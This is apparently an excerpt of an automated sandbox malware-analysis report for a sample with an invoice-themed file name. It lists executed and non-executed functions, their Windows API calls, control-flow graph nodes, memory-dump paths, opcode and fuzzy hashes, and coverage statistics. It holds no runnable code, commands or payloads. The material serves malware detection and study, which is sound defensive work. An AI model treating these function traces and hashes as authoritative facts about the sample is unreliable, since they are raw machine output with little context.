                                                                                                                                control_flow_graph 44 16cada8-16cadb7 45 16cadb9-16cadc6 call 16ca0cc 44->45 46 16cade3-16cade7 44->46 51 16caddc 45->51 52 16cadc8 45->52 48 16cade9-16cadf3 46->48 49 16cadfb-16cae3c 46->49 48->49 55 16cae3e-16cae46 49->55 56 16cae49-16cae57 49->56 51->46 99 16cadce call 16cb040 52->99 100 16cadce call 16cb030 52->100 55->56 57 16cae59-16cae5e 56->57 58 16cae7b-16cae7d 56->58 60 16cae69 57->60 61 16cae60-16cae67 call 16ca0d8 57->61 63 16cae80-16cae87 58->63 59 16cadd4-16cadd6 59->51 62 16caf18-16cafd8 59->62 65 16cae6b-16cae79 60->65 61->65 94 16cafda-16cafdd 62->94 95 16cafe0-16cb00b GetModuleHandleW 62->95 66 16cae89-16cae91 63->66 67 16cae94-16cae9b 63->67 65->63 66->67 69 16cae9d-16caea5 67->69 70 16caea8-16caeaa call 16ca0e8 67->70 69->70 73 16caeaf-16caeb1 70->73 75 16caebe-16caec3 73->75 76 16caeb3-16caebb 73->76 77 16caec5-16caecc 75->77 78 16caee1-16caeee 75->78 76->75 77->78 80 16caece-16caede call 16ca0f8 call 16ca108 77->80 85 16caef0-16caf0e 78->85 86 16caf11-16caf17 78->86 80->78 85->86 94->95 96 16cb00d-16cb013 95->96 97 16cb014-16cb028 95->97 96->97 99->59 100->59
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 016CAFFE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: af00b1324bc9f56b2e56328f9e4af662b3a643cb67f8a2770a276d07f7139e1e
                                                                                                                                • Instruction ID: 8f113dd8a02e6aa623a67a94c7ddb48626d37d2cd28a2042055889fb87aa65d0
                                                                                                                                • Opcode Fuzzy Hash: af00b1324bc9f56b2e56328f9e4af662b3a643cb67f8a2770a276d07f7139e1e
                                                                                                                                • Instruction Fuzzy Hash: C7813470A00B098FE724DF69C84476ABBF1FF88604F008A2DD546D7B40EB75E845CB94
                                                                                                                                Function 016C44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 101 16c44b0-16c59d9 CreateActCtxA 104 16c59db-16c59e1 101->104 105 16c59e2-16c5a3c 101->105 104->105 112 16c5a3e-16c5a41 105->112 113 16c5a4b-16c5a4f 105->113 112->113 114 16c5a60 113->114 115 16c5a51-16c5a5d 113->115 116 16c5a61 114->116 115->114 116->116
                                                                                                                                APIs
                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 016C59C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: c490f118b4c96cc3c6e147ed864e02d84c2a0ed56b57ac73bbe5baec2dc98c30
                                                                                                                                • Instruction ID: b75579c162aee681e27893d66a8cb9291a42dd5cfc6f55345c37ef81780629cf
                                                                                                                                • Opcode Fuzzy Hash: c490f118b4c96cc3c6e147ed864e02d84c2a0ed56b57ac73bbe5baec2dc98c30
                                                                                                                                • Instruction Fuzzy Hash: A541DEB0D0075DCBEB24CFAAC884B9EBBB5FF49704F20816AD409AB251DB756945CF90
                                                                                                                                Function 016C590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 118 16c590c-16c5913 119 16c591c-16c59d9 CreateActCtxA 118->119 121 16c59db-16c59e1 119->121 122 16c59e2-16c5a3c 119->122 121->122 129 16c5a3e-16c5a41 122->129 130 16c5a4b-16c5a4f 122->130 129->130 131 16c5a60 130->131 132 16c5a51-16c5a5d 130->132 133 16c5a61 131->133 132->131 133->133
                                                                                                                                APIs
                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 016C59C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: e81cfdd2e02e817d9fe2c7f4e791ef6f1392c9bf88ca8f5c69f84ee121075046
                                                                                                                                • Instruction ID: 40d23ec928c68e0a6464de0692db4df55425ab7a81bdc084619abc08130514c1
                                                                                                                                • Opcode Fuzzy Hash: e81cfdd2e02e817d9fe2c7f4e791ef6f1392c9bf88ca8f5c69f84ee121075046
                                                                                                                                • Instruction Fuzzy Hash: 8D411FB0D00718CBEB24CFAAC884BDDBBB1FF89704F20806AC409AB251DB756946CF50
                                                                                                                                Function 016CD751 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 135 16cd751-16cd758 136 16cd75a-16cd87e 135->136 137 16cd714-16cd724 DuplicateHandle 135->137 138 16cd72d-16cd74a 137->138 139 16cd726-16cd72c 137->139 139->138
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016CD717
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 703f3a049bf6ea3ec7458f68e37da362b5f346a40cb04f7a2983796b42a10ff5
                                                                                                                                • Instruction ID: 8534f0cf530f0a16392f5e657e181cd02cef64ab51af8d581dc656206f3a4190
                                                                                                                                • Opcode Fuzzy Hash: 703f3a049bf6ea3ec7458f68e37da362b5f346a40cb04f7a2983796b42a10ff5
                                                                                                                                • Instruction Fuzzy Hash: 36319234A403808FF718EF61E8857693BA5FB85750F208169E9529B3D8CBF85DA5CF12
                                                                                                                                Function 05A7D4DA Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 163 5a7d4da-5a7d52c 165 5a7d537-5a7d546 163->165 166 5a7d52e-5a7d534 163->166 167 5a7d54b-5a7d584 DrawTextExW 165->167 168 5a7d548 165->168 166->165 169 5a7d586-5a7d58c 167->169 170 5a7d58d-5a7d5aa 167->170 168->167 169->170
                                                                                                                                APIs
                                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05A7D4C5,?,?), ref: 05A7D577
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2213002671.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_5a70000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DrawText
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2175133113-0
                                                                                                                                • Opcode ID: bea7d3e4398c8222f3462ca98e9ccae1382ebee754b5656365d4f80131692661
                                                                                                                                • Instruction ID: 107ecb994ce54010990c17847e579679ebe655c6484910fb43409521d3089d65
                                                                                                                                • Opcode Fuzzy Hash: bea7d3e4398c8222f3462ca98e9ccae1382ebee754b5656365d4f80131692661
                                                                                                                                • Instruction Fuzzy Hash: E031C0B5D002499FDB10CF9AD884ADEFBF4FF58324F24842AE919A7210D774A945CFA0
                                                                                                                                Function 05A7C324 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 153 5a7c324-5a7d52c 155 5a7d537-5a7d546 153->155 156 5a7d52e-5a7d534 153->156 157 5a7d54b-5a7d584 DrawTextExW 155->157 158 5a7d548 155->158 156->155 159 5a7d586-5a7d58c 157->159 160 5a7d58d-5a7d5aa 157->160 158->157 159->160
                                                                                                                                APIs
                                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05A7D4C5,?,?), ref: 05A7D577
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2213002671.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_5a70000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DrawText
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2175133113-0
                                                                                                                                • Opcode ID: d45e53d1c1f36c142386047e3767fc796472250fe3d4b9bfa0eaca4451f05f23
                                                                                                                                • Instruction ID: 4639da6d6190d3e565d654ada4f5ba285416cbe668db2e5cf0a45ddd42e959fb
                                                                                                                                • Opcode Fuzzy Hash: d45e53d1c1f36c142386047e3767fc796472250fe3d4b9bfa0eaca4451f05f23
                                                                                                                                • Instruction Fuzzy Hash: 1C31C0B5D002499FDB10CF9AD884ADEBBF5FF48324F14842AE919A7210D774A944CFA4
                                                                                                                                Function 016CD688 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 173 16cd688-16cd724 DuplicateHandle 174 16cd72d-16cd74a 173->174 175 16cd726-16cd72c 173->175 175->174
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016CD717
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 24dbcdf6beeec3af7aff2ddb4c287380d7b731d9065655e6fb2d81ffe26f7829
                                                                                                                                • Instruction ID: ad7dec1cb0cacc99775894d8cdf18099d0554f8771d36e0665f3d445f4eec85d
                                                                                                                                • Opcode Fuzzy Hash: 24dbcdf6beeec3af7aff2ddb4c287380d7b731d9065655e6fb2d81ffe26f7829
                                                                                                                                • Instruction Fuzzy Hash: 4B21E5B5900249DFDB10CFAAD984AEEBFF5FB48314F14811AE955A7310D378A951CFA0
                                                                                                                                Function 016CD690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 178 16cd690-16cd724 DuplicateHandle 179 16cd72d-16cd74a 178->179 180 16cd726-16cd72c 178->180 180->179
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016CD717
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 5f1f147206a40ec5a8eccdf8e4e9d0c5abab5b97e0b2c11b332b2b670a611346
                                                                                                                                • Instruction ID: 9a1de4659e9e4fd1089d1d54431175c5ed750fc4778d09c5a467f3ce8e96ea84
                                                                                                                                • Opcode Fuzzy Hash: 5f1f147206a40ec5a8eccdf8e4e9d0c5abab5b97e0b2c11b332b2b670a611346
                                                                                                                                • Instruction Fuzzy Hash: B721E4B5900249DFDB10CF9AD984AEEBFF4FB48324F14801AE918A3310D378A950CFA0
                                                                                                                                Function 016CAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 183 16caf98-16cafd8 184 16cafda-16cafdd 183->184 185 16cafe0-16cb00b GetModuleHandleW 183->185 184->185 186 16cb00d-16cb013 185->186 187 16cb014-16cb028 185->187 186->187
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 016CAFFE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: 5216ff29593f0799cdf3be743d870612e26cb1e75e0333ffe192215d4cc44f85
                                                                                                                                • Instruction ID: 35343aeffb49932d7c0a085b3b89b38232204450a005751d48e5280542abc253
                                                                                                                                • Opcode Fuzzy Hash: 5216ff29593f0799cdf3be743d870612e26cb1e75e0333ffe192215d4cc44f85
                                                                                                                                • Instruction Fuzzy Hash: A31110B6C003498FDB10CF9AC844BDEFBF4EF88624F14842AD529A7210D379A545CFA1
                                                                                                                                Function 0165D1FC Relevance: .1, Instructions: 76COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188813324.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_165d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9c3a0c409d5447df8cd4f99d4892d373d7470c868d318e49a425d6fd355e9080
                                                                                                                                • Instruction ID: 139d9fac1518df098ee46d802e7dea944fbbd457fb961499013a4719157389fb
                                                                                                                                • Opcode Fuzzy Hash: 9c3a0c409d5447df8cd4f99d4892d373d7470c868d318e49a425d6fd355e9080
                                                                                                                                • Instruction Fuzzy Hash: FC21F1B2504240EFDB45DF94DDC0B2ABF65FB88324F20C569EE090A296C376D416CBA1
                                                                                                                                Function 0165D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188813324.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_165d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d35e0014a78d3eb72dd6642413985e4ff555d21174f90bc4bea1d41e3708f4b1
                                                                                                                                • Instruction ID: 7e93ec54cd4358f7a17aa59e92cf32c7f389c85518860680c98f4ee5c7be007a
                                                                                                                                • Opcode Fuzzy Hash: d35e0014a78d3eb72dd6642413985e4ff555d21174f90bc4bea1d41e3708f4b1
                                                                                                                                • Instruction Fuzzy Hash: 572103B2504244EFDB45DF54D9C0B2ABF65FB88318F20C569ED090B296C336D456CAA1
                                                                                                                                Function 0166D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188916631.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_166d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4eabf7bf52bdf4e0e44acde3ddb62821c6aec0d461a457fa2eaec4d726bbc9e8
                                                                                                                                • Instruction ID: a506247d06bce93c05b7e932c25ecdf740ac6a36a9d32f5fb4aef23337de818a
                                                                                                                                • Opcode Fuzzy Hash: 4eabf7bf52bdf4e0e44acde3ddb62821c6aec0d461a457fa2eaec4d726bbc9e8
                                                                                                                                • Instruction Fuzzy Hash: 372134B1604240EFDB05DF94D9C0B26BBADFB88324F24C56DEA8A4B352C376D446CA61
                                                                                                                                Function 0166D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188916631.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_166d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 428d0dae3bb8e0537ffb90aa95554d4aa908a502e6910b4ef64385b2e0e3af26
                                                                                                                                • Instruction ID: ce914a22960cb6dd695477a905337af54c997a76c3923362ba1e058062b24131
                                                                                                                                • Opcode Fuzzy Hash: 428d0dae3bb8e0537ffb90aa95554d4aa908a502e6910b4ef64385b2e0e3af26
                                                                                                                                • Instruction Fuzzy Hash: 1C212275604240EFDB15DF54D9C0B26BB69FB88314F20C56DE98A0B392C37BD847CAA1
                                                                                                                                Function 0165D1F7 Relevance: .1, Instructions: 57COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188813324.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_165d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                                                                                                                                • Instruction ID: 38a419dadc065604ef70ce270052f9cdd8893698e5d6a6cb309d60ce65a55d38
                                                                                                                                • Opcode Fuzzy Hash: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                                                                                                                                • Instruction Fuzzy Hash: 2E21DFB6404280CFDB06CF44D9C4B16BF72FB84324F24C1A9DD080B296C33AD426CBA1
                                                                                                                                Function 0165D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188813324.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_165d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                                • Instruction ID: 06987a99937322827096a883efd024ead80493d1c3f29281ed1810f53942528a
                                                                                                                                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                                • Instruction Fuzzy Hash: 4711AFB6504284DFCB16CF54D9C4B1ABF71FB84318F24C6A9DC490B656C33AD45ACBA1
                                                                                                                                Function 0166D017 Relevance: .1, Instructions: 53COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188916631.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_166d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                • Instruction ID: fa7a36b2a0bbb49dfe2c326cd7dcc4c66b63f0c5650fc20c2dd41ee5292d61dd
                                                                                                                                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                • Instruction Fuzzy Hash: 4B11BE75604280CFCB12CF54D9C4B15BB61FB84314F24C6A9D8494B756C33AD40ACB61
                                                                                                                                Function 0166D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188916631.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_166d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                • Instruction ID: 4e1e2980c88aad50c0f7e0bf96ae1b6f5225d4c185b0740db4e7c45aeefc3f0f
                                                                                                                                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                • Instruction Fuzzy Hash: 7A11BBB5604280DFCB12CF54C9C0B15BBA5FB84224F28C6A9D9894B3A6C33AD44ACB61
                                                                                                                                Function 0165D745 Relevance: .0, Instructions: 45COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188813324.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_165d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 28c88741dc323c2081d1d731a90a60eb9a7427c23ebd7ee78c73c75fbfe5af35
                                                                                                                                • Instruction ID: 8d2df835d53762f0f0c124e8a9c3d6ca9bf94ebce3c9e95cd38bcec260978794
                                                                                                                                • Opcode Fuzzy Hash: 28c88741dc323c2081d1d731a90a60eb9a7427c23ebd7ee78c73c75fbfe5af35
                                                                                                                                • Instruction Fuzzy Hash: B9012671004380EAF7508FA9CD84B76BF98DF41324F08C52AEE090A2C2D7B99841CAB1
                                                                                                                                Function 0165D744 Relevance: .0, Instructions: 36COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2188813324.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_165d000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0b1d2809ce8ce01b9e6211fa6b233a9d66a9cb1e4155bccc2589323a78d98f75
                                                                                                                                • Instruction ID: 1fba019ef7256192953c1f417f8ee57786bc4a6842fad19454af69a37aeb74e9
                                                                                                                                • Opcode Fuzzy Hash: 0b1d2809ce8ce01b9e6211fa6b233a9d66a9cb1e4155bccc2589323a78d98f75
                                                                                                                                • Instruction Fuzzy Hash: A1F06271405384AAF7518E59DD84B62FF98EB81634F18C55AEE084A2C6C3799844CBB1

                                                                                                                                Non-executed Functions

                                                                                                                                Function 05A73E22 Relevance: .3, Instructions: 269COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2213002671.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_5a70000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f5338b965bc2b319e20fa417f67c58af006f58a90d391dfc08fd12d481b89847
                                                                                                                                • Instruction ID: ed7a113d9f8996e3d40ea153335ad2876326e478a1fb67a410f02192d42a0f49
                                                                                                                                • Opcode Fuzzy Hash: f5338b965bc2b319e20fa417f67c58af006f58a90d391dfc08fd12d481b89847
                                                                                                                                • Instruction Fuzzy Hash: 7CD1F431C2475ACADB11EB64D99069DBBB1FF95300F50CB9AE1493B220EF706AD4CB91
                                                                                                                                Function 016CD5BC Relevance: .3, Instructions: 264COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7c49585cc1c7e1ea2d73452d83ce094b493a3422b24a56506ab9f6e208df1829
                                                                                                                                • Instruction ID: 7f841616a87e5f55d411c673e7945cbe2f80a70b725b9eadc7575d7b245cca24
                                                                                                                                • Opcode Fuzzy Hash: 7c49585cc1c7e1ea2d73452d83ce094b493a3422b24a56506ab9f6e208df1829
                                                                                                                                • Instruction Fuzzy Hash: 26A18F32E002168FCF05DFB5C8845AEBBB3FF85701B1585AEE905AB265DB71E916CB40
                                                                                                                                Function 05A73E30 Relevance: .3, Instructions: 264COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2213002671.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_5a70000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7244744d813cd313434cf5068d22f3bc38dcf33ea2541dbb84cd927317055205
                                                                                                                                • Instruction ID: c72ad60fa07aa0a8a4c3a848baa4bd05560520dcf74873f55d253ff6eb090434
                                                                                                                                • Opcode Fuzzy Hash: 7244744d813cd313434cf5068d22f3bc38dcf33ea2541dbb84cd927317055205
                                                                                                                                • Instruction Fuzzy Hash: D0D1F431C2475ACADB11EB64D990699BBB1FF95300F50C79AE1493B220EF706AD4CB91

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:1.2%
                                                                                                                                Dynamic/Decrypted Code Coverage:4.9%
                                                                                                                                Signature Coverage:7.7%
                                                                                                                                Total number of Nodes:143
                                                                                                                                Total number of Limit Nodes:13
